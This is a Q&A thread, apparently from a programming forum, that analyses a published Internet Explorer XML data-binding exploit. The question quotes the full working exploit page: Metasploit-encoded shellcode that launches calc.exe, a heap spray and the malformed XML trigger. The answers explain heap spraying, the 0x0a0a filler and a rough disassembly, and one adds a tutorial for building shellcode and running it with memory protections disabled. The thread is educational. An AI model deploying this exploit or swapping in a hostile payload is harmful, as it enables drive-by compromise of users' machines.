145
votes

I usually have no difficulty reading JavaScript code, but I can't figure out the logic of this one. The code is from an exploit that was published 4 days ago. You can find it at milw0rm.

Here is the code:

<html>
    <div id="replace">x</div>
    <script>
        // windows/exec - 148 bytes
        // http://www.metasploit.com
        // Encoder: x86/shikata_ga_nai
        // EXITFUNC=process, CMD=calc.exe
        var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

        // ugly heap spray, the d0nkey way!
        // works most of the time
        var spray = unescape("%u0a0a%u0a0a");

        do {
           spray += spray;
        } while(spray.length < 0xd0000);

        memory = new Array();

        for(i = 0; i < 100; i++)
           memory[i] = spray + shellcode;

        xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

        tag = document.getElementById("replace");
        tag.innerHTML = xmlcode;

    </script>
</html>

Here is what I believe it does, and I would like your help with the parts I misunderstand.

The variable shellcode contains the code that opens calc.exe. I do not understand how they came up with that weird string. Any idea?

The second thing is the variable spray. I do not understand this weird loop.

The third thing is the variable memory that is never used anywhere. Why do they create it?

Last thing: what does the XML tag do in the page?


So far I have received good answers, but mostly very general ones. I would like more explanation of the specific values in the code. One example is unescape("%u0a0a%u0a0a");. What does it mean? The same goes for the loop: why did the developer write length < 0xd0000? I would like a deeper understanding, not only the theory behind this code.

7
You should look into Heap Spraying: en.wikipedia.org/wiki/Heap_spraying - BobbyShaftoe
How do we successfully run this exploit? Do we have to run it in IE? - bad_keypoints

7 Answers

321
votes

The shellcode contains x86 machine instructions that carry out the actual payload. spray builds a long sequence of filler instructions that will be placed in memory. Since we usually can't find out the exact location of our shellcode in memory, we put a lot of nop-like instructions before it and jump to somewhere among them. The memory array holds the actual x86 code along with this sliding mechanism. We then feed the crafted XML to the library that has the bug. While it is being parsed, the bug causes the instruction pointer register to be set to somewhere in our sprayed data, leading to arbitrary code execution.

To understand it more deeply, you have to figure out what is in the x86 code. unescape converts the %uXXXX sequences in the string into the corresponding bytes, which end up in the spray variable. They form valid x86 code that fills a large chunk of the heap and slides into the start of the shellcode. The reason for the ending condition is string length limitations of the scripting engine: you can't have strings larger than a specific length.
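As a rough illustration of what unescape does with these strings, the sketch below decodes %uXXXX escapes by hand and lists the bytes in the order a little-endian x86 machine would store them. The helper names (decodePercentU, toLittleEndianBytes, toHex) are made up for this example, and it assumes each character occupies one 16-bit unit in memory.

```javascript
// Decode a string of %uXXXX escapes into 16-bit code units.
// (Hypothetical helper; it mimics what unescape does for this escape form.)
function decodePercentU(escaped) {
  const units = [];
  const pattern = /%u([0-9a-fA-F]{4})/g;
  let match;
  while ((match = pattern.exec(escaped)) !== null) {
    units.push(parseInt(match[1], 16));
  }
  return units;
}

// List the bytes of each 16-bit unit in little-endian (x86) memory order.
function toLittleEndianBytes(units) {
  const bytes = [];
  for (const unit of units) {
    bytes.push(unit & 0xff);        // low byte is stored first
    bytes.push((unit >> 8) & 0xff); // high byte follows
  }
  return bytes;
}

// Format a byte array as space-separated two-digit hex.
function toHex(bytes) {
  return bytes.map((b) => b.toString(16).padStart(2, "0")).join(" ");
}

// The spray seed: two characters, four identical bytes.
const sprayUnits = decodePercentU("%u0a0a%u0a0a");
const sprayBytes = toHex(toLittleEndianBytes(sprayUnits));
console.log(sprayUnits.length, sprayBytes); // prints: 2 0a 0a 0a 0a

// The first two units of the shellcode string: note the swapped byte pairs.
const headBytes = toHex(toLittleEndianBytes(decodePercentU("%uc92b%u1fb1")));
console.log(headBytes); // prints: 2b c9 b1 1f
```

Because every byte of the spray seed is 0a, its byte order does not matter; for the shellcode it does, since %uc92b ends up in memory as 2b c9.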

In x86 assembly, 0a0a represents or cl, [edx]. For the purposes of our exploit, this is effectively equivalent to a nop instruction. Wherever we land in the spray, execution falls through from one instruction to the next until it reaches the shellcode, which is the code we actually want to execute.
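To see why the two bytes 0a 0a read as or cl, [edx], here is a minimal sketch that splits the second byte (the ModRM byte) into its bit fields. It assumes 32-bit mode and handles only this one opcode and the simplest addressing form. decodeModRM and disassembleOr8 are illustrative names, not a real disassembler API.

```javascript
// Split an x86 ModRM byte into its three bit fields.
function decodeModRM(byte) {
  return {
    mod: (byte >> 6) & 0b11,  // addressing mode
    reg: (byte >> 3) & 0b111, // register operand
    rm: byte & 0b111,         // register or memory operand
  };
}

// 8-bit and 32-bit register names indexed by their 3-bit encoding.
const REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"];
const REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"];

// Handles only opcode 0x0A (OR r8, r/m8) with mod = 0 and a plain
// register-indirect operand; rm = 4 (SIB) and rm = 5 (disp32) are rejected.
function disassembleOr8(opcode, modrm) {
  if (opcode !== 0x0a) throw new Error("only opcode 0x0A is handled");
  const { mod, reg, rm } = decodeModRM(modrm);
  if (mod !== 0 || rm === 4 || rm === 5) {
    throw new Error("unsupported addressing form");
  }
  return `or ${REG8[reg]}, [${REG32[rm]}]`;
}

const fields = decodeModRM(0x0a); // 0x0a = 00 001 010 in binary
const text = disassembleOr8(0x0a, 0x0a);
console.log(fields, text);
```

The fields come out as mod = 0, reg = 1 (cl), and rm = 2 (edx), which gives or cl, [edx]. Since every byte is 0a, landing on an odd or an even offset yields the same instruction stream.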

If you look at the XML, you'll see 0x0a0a is there too. Describing exactly what happens requires specific knowledge of the exploit (you have to know where the bug is and how it's exploited, which I don't know). However, it seems that we force Internet Explorer to trigger the buggy code by setting innerHTML to that malicious XML string. Internet Explorer tries to parse it, and the buggy code somehow gives control to a memory location inside the array (since it's a large chunk, the probability of jumping there is high). When we jump there, the CPU keeps executing or cl, [edx] instructions until it reaches the beginning of the shellcode that's been put in memory.
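The "large chunk" can be put into numbers with a little arithmetic. The sketch below only simulates the length of spray; it allocates nothing large. It assumes 2 bytes per character and that each of the 100 array entries is a separate copy, and it ignores the appended shellcode, allocator headers, and where the heap actually starts. Treat the result as an order-of-magnitude estimate.

```javascript
// Simulate only the length of `spray` through the do/while loop.
function sprayLengthAfterLoop(initialLength, limit) {
  let length = initialLength;
  let iterations = 0;
  do {
    length += length; // same effect on the length as `spray += spray`
    iterations++;
  } while (length < limit);
  return { length, iterations };
}

const BYTES_PER_CHAR = 2; // assumption: 16-bit characters
const COPIES = 100;       // bound of the for loop in the question's code
const MIB = 1024 * 1024;

// "%u0a0a%u0a0a" decodes to 2 characters, so the loop starts at length 2.
const { length: sprayLength, iterations } = sprayLengthAfterLoop(2, 0xd0000);
const bytesPerCopy = sprayLength * BYTES_PER_CHAR;
const totalMiB = (bytesPerCopy * COPIES) / MIB;

// The address spelled out by the repeated 0a bytes, expressed in MiB.
const targetMiB = 0x0a0a0a0a / MIB;

console.log(iterations, sprayLength.toString(16), bytesPerCopy / MIB); // prints: 19 100000 2
console.log(totalMiB, targetMiB.toFixed(1));                           // prints: 200 160.6
```

Under these assumptions each string is 2 MiB and the 100 copies total about 200 MiB, while the address 0x0a0a0a0a sits about 160.6 MiB into the address space. That is consistent with the idea that a jump to 0x0a0a0a0a is likely to land inside the sprayed data, though it does not prove it.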

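I've disassembled the shellcode. Note that the listing below takes the two bytes of each %uXXXX escape in the order they are written (C9 2B 1F B1 ...), whereas x86 stores each 16-bit character little-endian, so the bytes actually in memory are swapped pairwise (2B C9 B1 1F ...). The payload is also encoded with x86/shikata_ga_nai, so most of it is not meaningful code until its decoder has run. Treat the instructions below as an illustration of the approach rather than what the CPU really executes: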

00000000  C9                leave
00000001  2B1F              sub ebx,[edi]
00000003  B10C              mov cl,0xc
00000005  BDC536DB9B        mov ebp,0x9bdb36c5
0000000A  D9C5              fld st5
0000000C  2474              and al,0x74
0000000E  5A                pop edx
0000000F  F4                hlt
00000010  EA8331FC0B6A6A    jmp 0x6a6a:0xbfc3183
00000017  03D4              add edx,esp
00000019  07                pop es
0000001A  67305CFF          xor [si-0x1],bl
0000001E  98                cwde
0000001F  BBD7FFA4FE        mov ebx,0xfea4ffd7
00000024  9B                wait
00000025  74AD              jz 0xffffffd4
00000027  058B8B028D        add eax,0x8d028b8b
0000002C  D893BCCD35A2      fcom dword [ebx+0xa235cdbc]
00000032  37                aaa
00000033  B84290A63A        mov eax,0x3aa69042
00000038  94                xchg eax,esp
00000039  E99AA4D58D        jmp 0x8dd5a4d8
0000003E  E5A3              in eax,0xa3
00000040  1F                pop ds
00000041  4C                dec esp
00000042  EB46              jmp short 0x8a
00000044  4B                dec ebx
00000045  8CD0              mov eax,ss
00000047  AD                lodsd
00000048  A844              test al,0x44
0000004A  52                push edx
0000004B  4A                dec edx
0000004C  3B81B80DD748      cmp eax,[ecx+0x48d70db8]
00000052  4B                dec ebx
00000053  D46C              aam 0x6c
00000055  46                inc esi
00000056  1392734A204F      adc edx,[edx+0x4f204a73]
0000005C  F8                clc
0000005D  6E                outsb
0000005E  DC8EA20726B4      fmul qword [esi+0xb42607a2]
00000064  04D4              add al,0xd4
00000066  D084ECBA978221    rol byte [esp+ebp*8+0x218297ba],1
0000006D  7CE8              jl 0x57
0000006F  C0CA8C            ror dl,0x8c
00000072  F4                hlt
00000073  A6                cmpsb
00000074  47                inc edi
00000075  210D2EA0B0CD      and [0xcdb0a02e],ecx
0000007B  2CA8              sub al,0xa8
0000007D  B05B              mov al,0x5b
0000007F  43                inc ebx
00000080  F4                hlt
00000081  24E8              and al,0xe8
00000083  7A9C              jpe 0x21
00000085  BB857DCBA0        mov ebx,0xa0cb7d85
0000008A  7DED              jnl 0x79
0000008C  92                xchg eax,edx
0000008D  09E1              or ecx,esp
0000008F  96                xchg eax,esi
00000090  315580            xor [ebp-0x80],edx

Understanding this shellcode requires knowledge of x86 assembly and of the bug in the MS library itself (to know what the system state is when we reach this point), not of JavaScript! The shellcode will in turn execute calc.exe.

10
votes

This looks like an exploit of the recent Internet Explorer bug for which Microsoft released the emergency patch. It uses a flaw in the databinding feature of Microsoft's XML handler that causes heap memory to be deallocated incorrectly.

Shellcode is machine code that will run when the bug occurs. Spray and memory are just some space allocated on the heap to help the exploitable condition occur.

3
votes

Heap spraying is a common way to exploit browser bugs. If you are interested, you can find several posts like this one: http://sf-freedom.blogspot.com/2006/06/heap-spraying-introduction.html

2
votes

Any time I see memory that doesn't get addressed in an exploit discussion, my first thought is that the exploit is some sort of buffer overflow, in which case the memory is either causing the buffer to overflow or is being accessed once the buffer overflows.

0
votes

This is from Metasploit, which means it's using one of Metasploit's shellcodes. It's open source, so you can go and grab it: http://www.metasploit.com/

0
votes

See Character encodings in HTML.

It's binary data encoded as a string, which JavaScript is decoding.

This is also a common trick in XSS.

You can see all the encoding tricks here:

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

0
votes

Simple shellcode example

Hello world in x86-64 assembly, AT&T syntax (Wizard in Training).

Set up the file: vim shellcodeExample.s

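.text           # code section
.globl _start   # export the entry point for the linker

_start:         # entry point
 jmp one        # jump to the call at label one

two:
 pop  %rcx         # pop the return address pushed by call: the address of the string
 xor  %rax, %rax   # clear %rax
 movb $4, %al      # syscall 4 = sys_write (int $0x80 interface)
 xor  %rbx, %rbx   # clear %rbx
 inc  %rbx         # %rbx = 1, the file descriptor of stdout (terminal)
 xor  %rdx, %rdx   # clear %rdx
 movb $13, %dl     # string size in bytes
 int  $0x80        # invoke sys_write
 movb $1, %al      # syscall 1 = sys_exit
 dec  %rbx         # %rbx = 0, the exit status
 int  $0x80        # invoke sys_exit

one:
 call two                   # push the address of the string, then jump up to two
 .ascii "hello world\r\n"   # the string sits right after the call, so its
                            # address is the return address that call pushes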

Assemble and link like so: as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.o

Now you have a binary that prints hello world. To see the machine code that will become the shellcode, type: objdump -D shellcode

You will get the output:

shellcode:     file format elf64-x86-64


Disassembly of section .text:

0000000000400078 <.text>:
  400078:   eb 1a                   jmp    0x400094
  40007a:   59                      pop    %rcx
  40007b:   48 31 c0                xor    %rax,%rax
  40007e:   b0 04                   mov    $0x4,%al
  400080:   48 31 db                xor    %rbx,%rbx
  400083:   48 ff c3                inc    %rbx
  400086:   48 31 d2                xor    %rdx,%rdx
  400089:   b2 0d                   mov    $0xd,%dl
  40008b:   cd 80                   int    $0x80
  40008d:   b0 01                   mov    $0x1,%al
  40008f:   48 ff cb                dec    %rbx
  400092:   cd 80                   int    $0x80
  400094:   e8 e1 ff ff ff          callq  0x40007a
  400099:   68 65 6c 6c 6f          pushq  $0x6f6c6c65
  40009e:   20 77 6f                and    %dh,0x6f(%rdi)
  4000a1:   72 6c                   jb     0x40010f
  4000a3:   64                      fs
  4000a4:   0d                      .byte 0xd
  4000a5:   0a                      .byte 0xa

Now if you look at the 4th line with text you will see: 400078: eb 1a jmp 0x400094

The part that says eb 1a is the hexadecimal encoding of the assembly instruction jmp one: eb is the opcode of a short jump and 1a is the distance from the next instruction to the label "one", where the call sits right before your string.
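The relative offsets in the objdump output can be checked by hand. A relative branch targets the address of the next instruction plus a signed displacement. The sketch below recomputes the targets of the jmp and the call from the listing; toSigned and branchTarget are illustrative helper names, not part of any tool.

```javascript
// Interpret the low `bits` bits of `value` as a two's-complement signed integer.
function toSigned(value, bits) {
  const sign = 2 ** (bits - 1);
  return value >= sign ? value - 2 ** bits : value;
}

// Target of a relative branch: address of the next instruction plus the
// signed displacement.
function branchTarget(address, instructionLength, displacement, bits) {
  return address + instructionLength + toSigned(displacement, bits);
}

// eb 1a at 0x400078: short jmp with the 8-bit displacement 0x1a.
const jmpTarget = branchTarget(0x400078, 2, 0x1a, 8);

// e8 e1 ff ff ff at 0x400094: call with the 32-bit little-endian
// displacement 0xffffffe1, which is -31 when read as a signed value.
const callTarget = branchTarget(0x400094, 5, 0xffffffe1, 32);

console.log(jmpTarget.toString(16), callTarget.toString(16)); // prints: 400094 40007a
```

Both results match the listing: the jmp lands on the call at 0x400094, and the call jumps back to the pop at 0x40007a. Because only relative offsets are encoded, the same bytes work wherever they are loaded.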

To prep your shellcode for execution, open another text file and store the hex values in a character array. To format the shellcode correctly, put \x before every hex value.

According to the objdump output, the shellcode for this example looks like the following:

unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\x0d\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

This example uses C for the array. Now you have working shellcode that writes "hello world" to stdout.

You can test the shellcode by placing it in a vulnerability, or you can write the following C program to test it:

vim execShellcode.cc; //linux command to create c file.

/* Below is the content of execShellcode.cc */
unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\x0d\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

int main(){
    ((void(*)(void))PAYLOAD)();
    return 0;
}

To compile the program type in:

gcc -fno-stack-protector -z execstack execShellcode.cc -o run

Run it with ./run. You now have a working example of simple shellcode development that was tested on Linux Mint/Debian.